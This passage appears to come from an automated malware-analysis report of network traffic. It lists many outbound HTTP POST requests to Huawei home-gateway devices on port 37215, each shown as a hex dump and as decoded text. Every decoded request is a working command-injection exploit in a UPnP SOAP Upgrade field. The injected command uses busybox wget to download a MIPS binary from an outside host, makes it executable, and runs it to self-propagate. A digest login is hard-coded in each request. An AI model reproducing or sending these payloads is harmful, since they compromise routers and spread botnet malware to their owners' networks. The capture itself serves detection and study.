20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          2176192.168.2.1537196157.206.232.11437215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:24.221982002 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          2177192.168.2.1548584197.77.120.11537215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:24.227046013 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          2178192.168.2.154583641.139.159.10237215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:24.227066040 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          2179192.168.2.1549290157.28.81.20837215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:25.123677015 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          2180192.168.2.1551316157.29.202.5437215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:25.123723030 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          2181192.168.2.1535916157.254.229.937215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:25.128537893 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          2182192.168.2.1541960157.113.135.14137215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:25.128570080 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          2183192.168.2.1556490145.195.202.2537215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:25.128782034 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          2184192.168.2.154513041.143.220.10537215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:25.133867979 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          2185192.168.2.155787041.96.167.14137215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:25.133888960 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          2186192.168.2.153901841.154.127.14937215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:25.133996964 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
